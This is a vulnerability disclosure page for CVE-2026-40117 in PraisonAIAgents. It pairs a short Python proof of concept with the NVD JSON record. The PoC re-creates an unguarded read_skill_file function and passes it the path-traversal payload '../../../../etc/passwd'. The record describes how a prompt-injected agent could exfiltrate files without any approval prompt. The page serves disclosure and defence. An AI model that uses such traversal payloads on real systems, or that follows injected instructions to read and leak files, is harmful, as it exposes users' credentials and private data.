CVE-2026-40117

# PoC for CVE-2026-40117: Arbitrary File Read in PraisonAIAgents # This simulates how an agent could read sensitive files due to unrestricted path parameter. def vulnerable_read_skill_file(skill_path): """ Vulnerable implementation of read_skill_file found in skill_tools.py < 1.5.128. It lacks workspace boundary checks. """ try: with open(skill_path, 'r') as f: return f.read() except FileNotFoundError: return "File not found." # Scenario: Attacker uses prompt injection to trick the agent # into calling this function with a sensitive path. malicious_payload = "../../../../etc/passwd" print(f"Attempting to read: {malicious_payload}") leaked_data = vulnerable_read_skill_file(malicious_payload) print("Leaked Content:") print(leaked_data)

{"cve": {"id": "CVE-2026-40117", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:35.447", "lastModified": "2026-04-17T18:23:42.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, read_skill_file() in skill_tools.py allows reading arbitrary files from the filesystem by accepting an unrestricted skill_path parameter. Unlike file_tools.read_file which enforces workspace boundary confinement, and unlike run_skill_script which requires critical-level approval, read_skill_file has neither protection. An agent influenced by prompt injection can exfiltrate sensitive files without triggering any approval prompt. This vulnerability is fixed in 1.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.128", "matchCriteriaId": "B1797C27-7EBC-4CEF-90B8-F84E8198632D"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-grrg-5cg9-58pf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}